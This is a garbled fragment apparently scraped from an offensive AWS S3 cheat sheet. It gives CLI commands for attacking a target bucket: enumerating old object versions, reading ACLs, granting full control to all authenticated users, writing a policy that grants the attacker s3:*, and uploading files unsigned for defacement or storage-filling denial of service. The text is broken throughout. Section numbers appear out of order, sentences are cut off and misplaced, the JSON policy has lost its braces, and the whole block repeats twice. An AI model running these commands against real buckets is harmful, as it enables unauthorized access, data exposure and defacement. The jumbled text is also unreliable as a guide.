aws s3api list-object-versions --bucket target-bucket Then download older version:
"Version": "2012-10-17", "Statement": [ "Effect": "Allow", "Principal": "AWS": "arn:aws:iam::YOUR_ACCOUNT:user/your-user", "Action": "s3:*", "Resource": ["arn:aws:s3:::target-bucket", "arn:aws:s3:::target-bucket/*"] ]
aws s3api put-bucket-acl --bucket target-bucket --grant-full-control uri=http://acs.amazonaws.com/groups/global/AuthenticatedUsers aws s3api get-bucket-policy --bucket target-bucket Policy may expose unintended access patterns. 2.6. s3:ListBucketVersions Reveals old/ deleted versions of objects:
aws s3api get-object-acl --bucket target-bucket --key secret.txt May reveal misconfigured grants. Allows you to grant yourself access:
echo "test" > test.txt aws s3 cp test.txt s3://target-bucket/test.txt --no-sign-request Upload malicious files, defacement, or fill storage (DoS). 2.3. Bucket Permissions – s3:GetObjectAcl If you can read ACLs but not objects:
Hacktricks Aws S3 Apr 2026
aws s3api list-object-versions --bucket target-bucket Then download older version:
"Version": "2012-10-17", "Statement": [ "Effect": "Allow", "Principal": "AWS": "arn:aws:iam::YOUR_ACCOUNT:user/your-user", "Action": "s3:*", "Resource": ["arn:aws:s3:::target-bucket", "arn:aws:s3:::target-bucket/*"] ]
aws s3api put-bucket-acl --bucket target-bucket --grant-full-control uri=http://acs.amazonaws.com/groups/global/AuthenticatedUsers aws s3api get-bucket-policy --bucket target-bucket Policy may expose unintended access patterns. 2.6. s3:ListBucketVersions Reveals old/ deleted versions of objects:
aws s3api get-object-acl --bucket target-bucket --key secret.txt May reveal misconfigured grants. Allows you to grant yourself access:
echo "test" > test.txt aws s3 cp test.txt s3://target-bucket/test.txt --no-sign-request Upload malicious files, defacement, or fill storage (DoS). 2.3. Bucket Permissions – s3:GetObjectAcl If you can read ACLs but not objects: